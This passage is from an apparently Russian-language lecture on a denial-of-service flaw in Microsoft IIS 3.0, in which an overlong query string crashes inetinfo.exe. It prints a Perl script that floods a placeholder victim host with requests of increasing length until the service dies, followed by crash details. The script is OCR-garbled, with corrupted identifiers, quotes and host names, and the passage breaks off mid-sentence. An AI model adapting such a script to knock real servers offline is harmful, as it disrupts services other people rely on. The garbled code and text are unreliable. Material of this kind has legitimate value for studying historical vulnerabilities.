Лекция: US 3.0 был подвержен другой DoS-атаке, связанной с получением запроса вида

www.victim.com/path?name^XXXX...

Если пара имя/значение имеет определенную длину (свою для каждого сервера, однако колеблется около 8

Кб), в процессе inetinfo.exe возникает нарушение доступа, приводящее к прекращению работы сервиса WWW.

Причем совершенно необязательно, чтобы на сервере существовал документ или скрипт path — до вызова

Документа дело просто не доходит. Подбирать нужную длину запроса можно вручную или с помощью, к

примеру, такой программы: #! /usr/bin/peri -w use Socket; $proto = getprotobynameCtcp' ); Sport = 80; $host =

«www.victim.corn»; $sin=sockaddr_in($port,inet_aton($host)): for ($i= 8000; $i<9000;$i++) {

print "\nTrying $i symbols: \n"; $value = 'z'x$i;

socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);

if(!connect(Socket_Handle,$sin)) {

$n=$i+4;

print "\n\nLooks like we got it: $n symbols"; exit; }

send Socket_Handle,«GET/path?nan]e=$value HTTP/I .0\n» ,0: send Socket_Handle,

«User-Agent: myagent\n»,0: sendSocket_Handle,"\n",0; while (<Socket_Handle> {

print $_; } }

Проверяя эту уязвимость, мы выяснили, что проблема проявилась во время отправки запроса длиной 8181

байт. При этом Dr. Watson вывел следующее сообщение об ошибке в программе INETINFO.EXE: <Access

violation, address Ох77А07614>..В результате более подробного рассмотрения дампа ошибки выяснилось, что по

еще рефераты
Еще работы по информатике